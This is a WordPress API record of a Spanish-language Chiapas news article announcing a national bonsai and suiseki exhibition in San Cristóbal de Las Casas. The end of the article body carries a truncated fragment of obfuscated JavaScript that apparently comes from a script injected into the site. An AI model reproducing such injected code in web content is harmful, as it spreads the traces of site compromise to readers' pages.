{"id":22883,"date":"2025-07-10T04:04:10","date_gmt":"2025-07-10T04:04:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22883"},"modified":"2025-07-10T04:04:11","modified_gmt":"2025-07-10T04:04:11","slug":"sclc-sera-sede-de-la-exposicion-nacional-de-bonsai-y-suiseki","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22883","title":{"rendered":"SCLC ser\u00e1 sede de la Exposici\u00f3n Nacional de Bonsai y Suiseki"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>9 de julio del 2025.- San Crist\u00f3bal de Las Casas.- Del 14 al 17 de agosto, el Centro Cultural de los Altos albergar\u00e1 la Exposici\u00f3n Nacional Uni\u00f3n de Bonsai y Suiseki Mexicano 2025, un evento que reunir\u00e1 a destacados exponentes de estas artes milenarias, tanto nacionales como internacionales.<\/p>\n\n\n\n<p>As\u00ed lo dio a conocer Consuelo Ruedas P\u00e9rez, representante de la Asociaci\u00f3n Balam Bonsai, quien detall\u00f3 que durante el evento se exhibir\u00e1n m\u00e1s de 40 ejemplares de bonsai y alrededor de 100 piezas de suiseki, una disciplina japonesa que consiste en la apreciaci\u00f3n de piedras naturales con formas art\u00edsticas.<\/p>\n\n\n\n<p>La exposici\u00f3n contar\u00e1 con la participaci\u00f3n de una veintena de expositores provenientes de diversos estados de la rep\u00fablica, as\u00ed como invitados de otros pa\u00edses, consolidando a San Crist\u00f3bal como un referente en la difusi\u00f3n del arte bonsai en M\u00e9xico.<\/p>\n\n\n\n<p>Adem\u00e1s de las muestras, el programa contempla una serie de conferencias y talleres abiertos al p\u00fablico, con el objetivo de acercar a m\u00e1s personas a este arte que conjuga paciencia, t\u00e9cnica y sensibilidad est\u00e9tica.<\/p>\n\n\n\n<p>Entre los participantes destacados, Ruedas P\u00e9rez mencion\u00f3 la presencia del coleccionista sancristobalense Rosendo Santiago Ram\u00edrez, quien aportar\u00e1 parte de su reconocida colecci\u00f3n al evento.<\/p>\n\n\n\n<p>La exposici\u00f3n se perfila como una oportunidad \u00fanica para disfrutar de una expresi\u00f3n art\u00edstica poco conocida, pero con profundas ra\u00edces culturales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal 9 de julio del 2025.- San Crist\u00f3bal de Las Casas.- Del 14 al 17 de agosto, el Centro Cultural de los Altos albergar\u00e1 la Exposici\u00f3n Nacional Uni\u00f3n de Bonsai y Suiseki Mexicano 2025, un evento que reunir\u00e1 a destacados exponentes de estas artes milenarias, tanto nacionales como internacionales. As\u00ed lo dio a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22885,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22883","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22883","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22883"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22883\/revisions"}],"predecessor-version":[{"id":22886,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22883\/revisions\/22886"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22885"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22883"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}